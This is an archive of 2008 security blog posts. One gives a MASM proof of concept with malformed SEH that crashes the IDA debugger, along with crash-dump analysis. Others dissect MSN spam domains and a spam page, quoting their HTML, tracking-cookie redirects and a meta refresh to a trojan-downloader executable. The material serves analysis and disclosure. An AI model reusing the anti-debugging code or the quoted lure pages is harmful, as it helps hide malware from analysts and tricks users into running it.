IDA Debugger Malformed SEH Causes Crash

August 31, 2008

Hi,

Malformed SEH Code causes IDA Debugger (idag.exe) crash.

This is the crashing code sample

;####  IDA Debugger Crash ####
;
; Author: Giuseppe ‘Evilcry’ Bonfa’
; http://evilcry.altervista.org
; E-Mail: evilcodecave (AT) gmail (DOT) com
;
;  Malformed Exception Handlers causes IDA Debugger Core Dump
;
;##################
.586
.model flat, stdcall
option casemap: none
;###################
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
titolo db “Titolo”,0
testo db “Exception!”,0
.code
START:
assume fs:nothing
push offset exceptHandler
push fs:[0]
mov fs:[0], esp
xor eax,eax
mov eax,[eax]    ;## Generate Exception ##
pop fs:[0]
add esp,4
jmp exit
exceptHandler:
pusha
invoke MessageBox,NULL, ADDR testo, ADDR titolo, MB_OK
popa
xor eax,eax
ret
exit:
invoke ExitProcess, 0
end START

As you can see this is only an SEH that is called in an infinite loop. If this sample code is debugged with IDA Debugger it causes a Dump that blocks IDA.

From the Dump Analysis we can see that the problem is caused by KiFastSystemCallRet

0:000> !analyze -v

FAULTING_IP:
+0
00000000 ??              ???
EXCEPTION_RECORD:  ffffffff — (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
ExceptionCode: 80000003 (Break instruction exception)
ExceptionFlags: 00000000
NumberParameters: 0
FAULTING_THREAD:  000003dc
DEFAULT_BUCKET_ID:  FILL_PATTERN_ffffffff
PROCESS_NAME:  idag.exe
ERROR_CODE: (NTSTATUS) 0×80000003 – {ERRORE DI EXCEPTION}  Breakpoint  È stato raggiunto un breakpoint.
APPLICATION_VERIFIER_FLAGS:  0
PRIMARY_PROBLEM_CLASS:  FILL_PATTERN_ffffffff
BUGCHECK_STR:  APPLICATION_FAULT_FILL_PATTERN_ffffffff
LAST_CONTROL_TRANSFER:  from 7c91e027 to 7c91eb94
STACK_TEXT:
0012a250 7c91e027 7c80aaed ffffffff 0000000c ntdll!KiFastSystemCallRet
0012a254 7c80aaed ffffffff 0000000c 7c91e639 ntdll!NtQueryInformationProcess+0xc
0012a284 7c8132b1 7c8132c4 000001e4 00000364 kernel32!GetErrorMode+0×18
0012a548 00000000 0012a6f0 03de0cd3 03de0ce8 kernel32!GetLongPathNameW+0x3ab
STACK_COMMAND:  ~0s; .ecxr ; kb
FOLLOWUP_IP:
ntdll!KiFastSystemCallRet+0
7c91eb94 c3              ret
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  ntdll!KiFastSystemCallRet+0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: ntdll
IMAGE_NAME:  ntdll.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  41252c01
FAILURE_BUCKET_ID:  FILL_PATTERN_ffffffff_80000003_ntdll.dll!KiFastSystemCallRet
BUCKET_ID:  APPLICATION_FAULT_FILL_PATTERN_ffffffff_ntdll!KiFastSystemCallRet+0

And this is the Stack BackTrace

0:000> ~*k

.  0  Id: 364.3dc Suspend: 0 Teb: 7ffde000 Unfrozen
ChildEBP RetAddr
0012a250 7c91e027 ntdll!KiFastSystemCallRet
0012a254 7c80aaed ntdll!NtQueryInformationProcess+0xc
0012a284 7c8132b1 kernel32!GetErrorMode+0×18
0012a548 00000000 kernel32!GetLongPathNameW+0x3ab

1  Id: 364.574 Suspend: 0 Teb: 7ffdd000 Unfrozen
ChildEBP RetAddr
0157fd54 7c91e9c0 ntdll!KiFastSystemCallRet
0157fd58 719d4033 ntdll!ZwWaitForSingleObject+0xc
0157fd94 719e104f mswsock!SockWaitForSingleObject+0x1a0
0157fe14 71a3f6cf mswsock!WSPRecvFrom+0x1f0
0157fe58 71a5303e ws2_32!WSARecvFrom+0x7d
0157fe8c 004fc31b wsock32!recvfrom+0×39
WARNING: Stack unwind information not available. Following frames may be wrong.
00000000 00000000 idag!Debugger_breakpointFinalize+0x1ce7


The MSN Dark Chain of Spam – yopicz.com and others

August 26, 2008

Hi,

As you have seen from my precedent posts in this period MSN Privacy Threat Domains signed a significative incrase. You can also see how methods and structures used in these domains are similar.

The same HongKong Domain runned with the same HTTP-Daemon, the same way of Tracking Cookie releasing and finally different advertised End Point Domains.

Now my question was “Is possible to reveal the presence of a Chain of Spam Informations between these sites?”

The response come out automatically yesterday, some time ago I’ve created a fake MSN Account and joined to one of these “Services”, precisely yopicz.com.

yopicz.com is one of the classical Domain spreaded through MSN, but with some basilar difference respect others one.

Let’s see the code:

<html>
<head>
<title></title>
</head>
<frameset cols=”0,*” frameborder=0>
<frame src=”pop.php” name=””>
<frame src=”indexx.php” name=”mainwindow”>
</frameset>
</html>
<script src=”http://www.google-analytics.com/urchin.js&#8221; type=”text/javascript”>
</script>
<script type=”text/javascript”>
_uacct = “UA-3898830-2″;
urchinTracker();
</script>

-> pop.php

<script>
var UserClicked=false;
document.onkeydown=spyclick;
document.onmousedown=spyclick;
function spyclick()
{
UserClicked=true;
setTimeout(“UserClicked=false”,2000);
}
function popup()
{
if(!UserClicked)
{
var win=window.open(“http://awesomeoffers.info&#8221;,””,”width=1024,height=768″)
}
}
window.onbeforeunload=popup;
</script>

In other words you’re redirected to awesomeoffers.info that is the advertised Website.

-> indexx.php

Contains a fake Privacy Policy

“By filling out this form, you authorize TST Management, Inc to spread the word
about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word.  This is a harmless
Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

TST Management, Inc reserves the right to change the terms of use / privacy policy
at any time without notice. To view the latest version of this privacy policy,
simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this

agreement and the terms of use you accepted when you signed up with MSN. You also
understand that by temporarily accessing your msn account, TST Management, Inc
is NOT agreeing to MSN’s terms
of use and therefore not bound by them.

Eheheheheeh strange this TST Management!! has a “Legal” Privacy Policy that is not conventionally written, a “Legal Policy” that breaks Microsoft and MSN Laws? wooow are in front of a new frontier of legality!! Sign a Legal Policy to Break legally third parties laws! :)

After substribing to yopicz.com my HoneyPot account popped with various advices from

  • awesomezz.com
  • PassionZz.com
  • RealDealzz.com
  • insaneimagz.com

So this IS a CHAIN of Spam Websites that exchange/sends your credentials to the various domains!

If you receive other of these advices report me it, and I’ll dissect it :)

May the God of Paranoia be with you :)


MSN Privacy Threat – passionzz.com

August 25, 2008

Hi,

Here another Privacy threat similar to the previous already seen  the malicious domain is spreaded by offline MSN contacts in form of

http://_mail_address.passionzz.com

Here the classical source html already seen:

<html>
<head>
<title></title>
</head>
<frameset rows=”*,30,1″ frameborder=0>
<frame src=”indexx.php” name=””>
<frame src=”abuse.html” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src=”body.php” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
</frameset>
</html>

-> abuse.html

<center><b>Send Abuses to <a href=”mailto:abuse@cpashield.com”>abuse@cpashield.com</a></b>

-> body.php

<img src=”http://www.ipcounter.de/count.php?u=53083499&amp;color=pink&#8221; alt=”” border=”0″ width=0 height=0></a></noscript><img src=”http://www.ipcounter.de/count.php?u=54136814&amp;color=pink&#8221; alt=”” border=”0″ width=0 height=0></a></noscript>

-> indexx.php

Redirection to http://www.incentaclick.com/nclick.php?id=16550&cid=3915&sub=newadx_passion

<html><head><title>Incentaclick Media</title><meta http-equiv=’refresh’ content=”0;url=http://banners.passion.com/go/page/25647_landing_passion_01b?pid=p497792.sub16550-newadx_passion&ip=auto”></head><body></body></html>

Tracking Cookie Installation

Set-Cookie: IncentaclickUC391516550=391516550newadx_passion; expires=Wed, 24-Sep-2008 17:08:59 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC391516550=391516550newadx_passion; expires=Wed, 24-Sep-2008 17:08:59 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3915=16550-newadx_passion; expires=Sun, 23-Nov-2008 17:08:59 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3915=16550-newadx_passion; expires=Sun, 23-Nov-2008 17:08:59 GMT; path=/; domain=www.incentaclick.com

After that Incentaclick trasparently installs its tracking cookies you’re redirected to

http://banners.passion.com/go/page/25647_landing_passion_01b?pid=p497792.sub16550-newadx_passion&ip=auto

Registry Data

ICANN Registrar: ENOM, INC.
Created: 2008-08-24
Expires: 2009-08-24
Updated: 2008-08-24
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 99,883 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com

jQuery(‘#registryDataContainer’).show();

Server Data

IP Address: 127.0.0.1
IP Location – Loopback
Response Code: 200
Domain Status: Registered And Active Website

Remove Instructions

Remove Cookie and Change your MSN Passwords!!!!

See you to the next Post… :)


Another MSN Privacy / Spam Threat awesomezz.com

August 21, 2008

Hi,

Thanks to the signalation of Roberta I’ve identified another MSN spreading Spam/Privacy threat.

The structure is completely equal to ultimatestufff, but changes the End-Point Domain.

Online contacts receives an offline message composed in this way http://_mail_address.awesomezz.com

Let’s dissect it!

From HTTP headers we can see that this domain is runned by a little Webserver

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/4.4.8
Content-type: text/html
Content-Length: 242
Date: Thu, 21 Aug 2008 15:00:41 GMT
Server: lighttpd/1.4.19

And this is the html code

<html>
<head>
<title></title>
</head>
<frameset rows=”*,30,1″ frameborder=0>
<frame src=”indexx.php” name=””>
<frame src=”abuse.html” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src=”counter.php” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
</frameset>
</html>

-> counter.php

<img src=”http://www.ipcounter.de/count.php?u=52572355&amp;color=pink” alt=”” border=”0″ width=0 height=0></a></noscript><img src=”http://www.ipcounter.de/count.php?u=54136814&amp;color=pink&#8221; alt=”” border=”0″ width=0 height=0></a></noscript>

-> abuse.html

<center><b>Send Abuses to <a href=”mailto:abuse@cpashield.com“>abuse@cpashield.com</a></b>

-> indexx.php

The way is always the same, the user lands to a certain Website by passing from another Website that installs some Tracking Cookies. Indeed as we can see indexx.php points to Incentaclick

http://www.incentaclick.com/nclick.php?id=17133&cid=4804&sub=newadx_ita

that trasparently (a common user will not see that passage) installs some cookie:

Set-Cookie: IncentaclickUC480417133=480417133newadx_ita; expires=Sat, 20-Sep-2008 07:00:43 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC480417133=480417133newadx_ita; expires=Sat, 20-Sep-2008 07:00:43 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie4804=17133-newadx_ita; expires=Wed, 19-Nov-2008 07:00:43 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie4804=17133-newadx_ita; expires=Wed, 19-Nov-2008 07:00:43 GMT; path=/; domain=www.incentaclick.com

Redirection points to

http://www.flycell.it/offer/?ref=2650&transid=17133-newadx_ita

The Pattern is totally similar to Ultimatestufff.com, with the difference that the End-Points seems to be a Website for Cellulars, but probabily user is asked to give MSN Credentials

Here the Domain Analysis:

Registry Data

ICANN Registrar: ENOM, INC.
Created: 2008-08-20
Expires: 2009-08-20
Updated: 2008-08-20
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 96,391 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com

jQuery(‘#registryDataContainer’).show();

Server Data

IP Address: 210.56.53.73
IP Location Hong Kong – Hong Kong (sar) – Hong Kong – Sun Network (hong Kong) Limited
Response Code: 200
Domain Status: Registered And Active Website

See you to the next post


New MSN Privacy Threat – ultimatestufff.com

August 17, 2008

Hi,

Today I was informed of a new Privacy Threat spreaded through MSN.

Offline contacts sends to all online contacts the following link http://ultimatestufff.com/

Let’s see how ultimatestufff works..

At a first analysis dissection we can see that this Webservice is runned surely from
a little private server;

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/4.4.8
Content-type: text/html
Content-Length: 345
Date: Sun, 17 Aug 2008 13:04:33 GMT
Server: lighttpd/1.4.19

Because lighttpd is used.

The content of the first page is similar to my previous MSN-Malicious-Website discovery,
indeed we have:

<html>
<head>
<title></title>
</head>
<frameset rows=”*,30,1″ frameborder=0>

<frame src=”indexx.php” name=””>
<frame src=”abuse.html” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src=”counter.php” name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>

</frameset>
</html>

-> abuse.html

<center><b>Send Abuses to <a href=”mailto:abuse@cpashield.com“>abuse@cpashield.com</a></b>

Looks perfectly similar to the previous case, but without java obfuscation.

-> counter.php

<img src=”http://www.ipcounter.de/count.php?u=52572355&amp;color=pink&#8221; alt=”” border=”0″ width=0 height=0></a></noscript><img src=”http://www.ipcounter.de/count.php?u=54136814&amp;color=pink&#8221; alt=”” border=”0″ width=0 height=0></a></noscript>

And finally the most intersting, indexx.php that performs a redirection to:

http://www.incentaclick.com/nclick.php?id=14955&cid=3674&sub=newadx

This time the entity of the Webservice is more important, is used a famous service Incentaclick
that installs some Tracking Cookies:

HTTP/1.1 200 OK
Date: Sun, 17 Aug 2008 05:06:08 GMT
Server: Apache
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
P3P: CP=”NOI DSP COR NID”
Content-Length: 184
Connection: close
Content-Type: text/html; charset=UTF-8

And this is the source code:

<html><head><title>Incentaclick Media</title><meta http-equiv=’refresh’ content=”0;url=http://www.perfspot.com/join.asp?LanguageID=1&p=98958&t=14955-newadx“></head><body></body></html>

As you can see there is a Meta Renfresh that redirects (instantly!) the user to another
website:

http://www.perfspot.com/join.asp?languageid=1&p=98958&t=14955-newadx

A common visitor will not see the passage from Incentaclick, but will have its cookies..

Perfspot is a Website that offers a Meeting Service.

It’s interesting to see that during registration the user is asked to provide MSN/Linkedin/Live account, and is this the point where dumb user allows perfspot to reach other users.

Another interesting point is that, after you have completed the registration you’re automatically prompted to a geo-location that corresponds to the location of the Offline user that sent you the Advisory.

Here the Domain Informations for ultimatestufff.com

Domain Informations

ICANN Registrar: ENOM, INC.
Created: 2008-08-15
Expires: 2009-08-15
Updated: 2008-08-15
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 94,989 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com

jQuery(‘#registryDataContainer’).show();

Server Data

IP Address: 210.56.53.73
IP Location Hong Kong – Hong Kong (sar) – Hong Kong – Sun Network (hong Kong) Limited
Response Code: 200
Domain Status: Registered And Active Website

What to say..I’m a proud paranoid!!! :)

See you to the next post..

PS: I’m open to job offerings! :)


Malicious Spam in Action

August 11, 2008

Hi,

Usually Spam is targeted to Marketing Massive Action, that does not contains any form of Malicious Code, but in the last period there is a second collateral and heavly emerging trend (especially into Web Applications that allows comments, as Blogs) is the Malicious Spam, an apparent mail of Spam that redirects you to malicious code..

Here the latest Malicious Spam Mail that I’ve received on my gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that a redirection is done

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<html>
<head>
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=http://robbiereel.com/video3425gdf3.exe”>
<title></title>
</head>

<body style=”background:#ffffff;”>
<iframe src=”http://ro{CENSORED}l.com/pindex.php” style=”width:1px; height:1px;”></iframe><br>

<div style=”text-align:center; padding-top:50px;”>
<a href=”http://ro{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold;”><img src=”wait.gif” style=”border:0px;”></a><br>
<br>
<a href=”http://r{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold; color:#364980; font-size:17px;”>Download Video</a>

</div>
</body>
</html>

The technique is always the same, a fake Video.exe that the Victim download and executes, in this case the malware is named video3425gdf3.exe

Let’s analyse video3425gdf3.exe

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg


Follow

Get every new post delivered to your Inbox.